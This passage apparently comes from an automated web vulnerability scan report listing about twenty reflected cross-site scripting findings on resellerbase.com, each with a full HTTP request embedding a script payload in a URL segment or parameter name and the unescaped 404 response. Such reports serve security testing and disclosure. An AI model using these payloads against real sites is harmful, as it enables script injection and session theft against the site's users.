<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14c7db8<script>alert(1)</script>83376a0740b/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1147. http://www.resellerbase.com/detail/14/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb2e5<script>alert(1)</script>09f64ad2d47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themesbb2e5<script>alert(1)</script>09f64ad2d47/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themesbb2e5<script>alert(1)</script>09f64ad2d47/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1148. http://www.resellerbase.com/detail/14/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dee6f<script>alert(1)</script>54166cc5945 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmosdee6f<script>alert(1)</script>54166cc5945/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmosdee6f<script>alert(1)</script>54166cc5945/images/ was not found on this server.</p>
...[SNIP]...

2.1149. http://www.resellerbase.com/detail/14/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8f586<script>alert(1)</script>3f0e7846c79 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images8f586<script>alert(1)</script>3f0e7846c79/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images8f586<script>alert(1)</script>3f0e7846c79/ was not found on this server.</p>
...[SNIP]...

2.1150. http://www.resellerbase.com/detail/14/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cab3a<script>alert(1)</script>fe1494c358 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/?cab3a<script>alert(1)</script>fe1494c358=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/?cab3a<script>alert(1)</script>fe1494c358=1 was not found on this server.</p>
...[SNIP]...

2.1151. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b394<script>alert(1)</script>eccf831601d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2b394<script>alert(1)</script>eccf831601d/14/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2b394<script>alert(1)</script>eccf831601d/14/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1152. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2a8d6<script>alert(1)</script>22e40c8b6b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/142a8d6<script>alert(1)</script>22e40c8b6b4/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/142a8d6<script>alert(1)</script>22e40c8b6b4/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1153. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb87d<script>alert(1)</script>57a184d62c7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themesbb87d<script>alert(1)</script>57a184d62c7/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themesbb87d<script>alert(1)</script>57a184d62c7/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1154. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload de783<script>alert(1)</script>4bb4874f72c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmosde783<script>alert(1)</script>4bb4874f72c/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmosde783<script>alert(1)</script>4bb4874f72c/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1155. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5ed27<script>alert(1)</script>164f5e25b74 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images5ed27<script>alert(1)</script>164f5e25b74/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images5ed27<script>alert(1)</script>164f5e25b74/rating/ was not found on this server.</p>
...[SNIP]...

2.1156. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c3284<script>alert(1)</script>33a33f4b3b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/ratingc3284<script>alert(1)</script>33a33f4b3b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/ratingc3284<script>alert(1)</script>33a33f4b3b/ was not found on this server.</p>
...[SNIP]...

2.1157. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e03e0<script>alert(1)</script>d1554004063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/rating/?e03e0<script>alert(1)</script>d1554004063=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/?e03e0<script>alert(1)</script>d1554004063=1 was not found on this server.</p>
...[SNIP]...

2.1158. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52daf<script>alert(1)</script>088dd4be227 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail52daf<script>alert(1)</script>088dd4be227/14/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail52daf<script>alert(1)</script>088dd4be227/14/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.1159. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b2d9<script>alert(1)</script>82a6b256881 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/142b2d9<script>alert(1)</script>82a6b256881/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/142b2d9<script>alert(1)</script>82a6b256881/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.1160. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1d088<script>alert(1)</script>841e4a491a8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes1d088<script>alert(1)</script>841e4a491a8/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes1d088<script>alert(1)</script>841e4a491a8/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.1161. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ab83d<script>alert(1)</script>32330b93f73 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmosab83d<script>alert(1)</script>32330b93f73/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmosab83d<script>alert(1)</script>32330b93f73/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.1162. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4b0e7<script>alert(1)</script>88b97ae7152 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images4b0e7<script>alert(1)</script>88b97ae7152/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images4b0e7<script>alert(1)</script>88b97ae7152/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.1163. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 41098<script>alert(1)</script>af4bad604d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/rating41098<script>alert(1)</script>af4bad604d6/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating41098<script>alert(1)</script>af4bad604d6/4half.gif was not found on this server.</p>
...[SNIP]...

2.1164. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a6c37<script>alert(1)</script>161f350d27f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/rating/4half.gifa6c37<script>alert(1)</script>161f350d27f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/4half.gifa6c37<script>alert(1)</script>161f350d27f was not found on this server.</p>
...[SNIP]...

2.1165. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f718b<script>alert(1)</script>4c9856a1bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/rating/4half.gif?f718b<script>alert(1)</script>4c9856a1bc1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/4half.gif?f718b<script>alert(1)</script>4c9856a1bc1=1 was not found on this server.</p>
...[SNIP]...

2.1166. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44fda<script>alert(1)</script>cf8ba662e94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

